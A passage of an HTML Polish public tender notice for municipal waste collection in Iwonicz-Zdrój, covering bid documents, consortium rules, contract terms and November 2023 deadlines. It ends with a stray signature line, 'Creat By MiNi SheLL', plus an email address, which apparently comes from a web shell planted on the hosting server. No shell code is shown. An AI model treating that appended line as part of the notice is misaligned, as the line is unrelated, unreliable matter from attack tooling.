odpadami, zgodnie z wymogami ustawy o odpadach (Dz. U. z 2023 r. poz. 1587 z późn. zm.) <br/><br/>UWAGA: <br/>Wykonawcy wspólnie ubiegający się o zamówienie (konsorcjum, spółka cywilna) muszą wykazać, że wyżej wspomniany warunek udziału w postępowaniu spełnia samodzielnie każdy z wykonawców wchodzących w skład konsorcjum/spółki cywilnej, na którym ciążyć będzie obowiązek realizacji części zamówienia objętej obowiązkiem posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. W celu wykazania braku podstaw do wykluczenia wykonawca zobowiązany jest złożyć wraz z ofertą oświadczenie o braku okoliczności, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących<br/>ochronie bezpieczeństwa narodowego.<br/>2. Oferta (zalecane na załączniku do SWZ) - musi być podpisana przez osobę/osoby wykonawcy uprawnioną/ne do zaciągania zobowiązań w Jego imieniu bądź przez ustanowionego przez nią/nie pełnomocnika/ów. Wykonawcy składający ofertę wspólną są zobowiązani do ustanowienia pełnomocnika.<br/>Pełnomocnictwo może dotyczyć zarówno reprezentowania wszystkich wykonawców składających wspólną ofertę w postępowaniu o udzielenie zamówienia publicznego, jak i podpisania w ich imieniu umowy o zamówienie publiczne. Jeżeli<br/>pełnomocnictwo upoważnia jedynie do reprezentowania wykonawców w postępowaniu, to przed podpisaniem umowy z<br/>Zamawiającym wymagane będzie złożenie kopii umowy regulującej współpracę tych wykonawców (art. 59 ustawy Pzp).<br/>Pełnomocnictwo musi wskazywać pełnomocnika (w tym zakres jego umocowania), a także wskazywać wszystkich wykonawców wspólnie ubiegających się o zamówienie. Pełnomocnictwo musi być podpisane przez osoby wykonawców składających wspólną ofertę uprawnione do zaciągania zobowiązań w jego imieniu. Pełnomocnictwo, o którym mowa w niniejszym punkcie musi zostać złożone wraz z ofertą w formie oryginału lub kopii poświadczonej notarialnie.<br/>3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy składający ofertę wspólną są zobowiązani do ustanowienia pełnomocnika. Pełnomocnictwo może dotyczyć<br/>zarówno reprezentowania wszystkich wykonawców składających wspólną ofertę w postępowaniu o udzielenie zamówienia<br/>publicznego, jak i podpisania w ich imieniu umowy o zamówienie publiczne. Jeżeli pełnomocnictwo upoważnia jedynie do<br/>reprezentowania wykonawców w postępowaniu, to przed podpisaniem umowy z Zamawiającym wymagane będzie złożenie<br/>kopii umowy regulującej współpracę tych wykonawców (art. 59 ustawy Pzp). Pełnomocnictwo musi wskazywać pełnomocnika (w tym zakres jego umocowania), a także wskazywać wszystkich wykonawców wspólnie ubiegających się o zamówienie. Pełnomocnictwo musi być podpisane przez osoby wykonawców składających wspólną ofertę uprawnione do zaciągania zobowiązań w jego imieniu. Pełnomocnictwo, o którym mowa w niniejszym punkcie musi zostać złożone wraz z ofertą w formie oryginału lub kopii poświadczonej notarialnie. Korespondencja z Zamawiającym oraz rozliczenia z wykonawcami dokonywane będą przez pełnomocnika wskazanego pełnomocnictwem. Podmiot składający ofertę jako uczestnik konsorcjum i jednocześnie składający ofertę samodzielnie lub jako uczestnik innego konsorcjum zostanie potraktowany jako składający dwie oferty i na tej podstawie wszystkie oferty z jego udziałem zostaną odrzucone. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie wskazanym w<br/>projekcie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-17 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/iwonicz-zdroj/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-17 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca w porozumieniu z Zamawiającym przygotuje harmonogram wywozu odpadów komunalnych z terenu Gminy Iwonicz-Zdrój z podziałem na miejscowości tj.: Iwonicz-Zdrój, Iwonicz, Lubatówka i Lubatowa w terminie 7 dni od dnia podpisania umowy. Harmonogram będzie stanowił integralną część umowy. Zamawiający zastrzega sobie możliwość wprowadzenia zmian w porozumieniu z Wykonawcą. <br/><br/>W przypadku użycia w dokumentacji przetargowej (SWZ wraz z załącznikami) nazw własnych, technologii, narzędzi, materiałów itp. należy je traktować jako przykładowe mające na celu doprecyzowanie przedmiotu zamówienia oraz określające standard techniczny i jakościowy. Technologia, narzędzia i materiały do wykonania zamówienia należy przyjmować w kategorii jakości nie niższej (równoważnej) niż ta wskazana w SWZ i załącznikach do niej. <br/><br/>Zaleca się aby Wykonawca dokonał wizji lokalnej terenu na którym będzie świadczona usługa i zapoznał się z przedmiotem zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com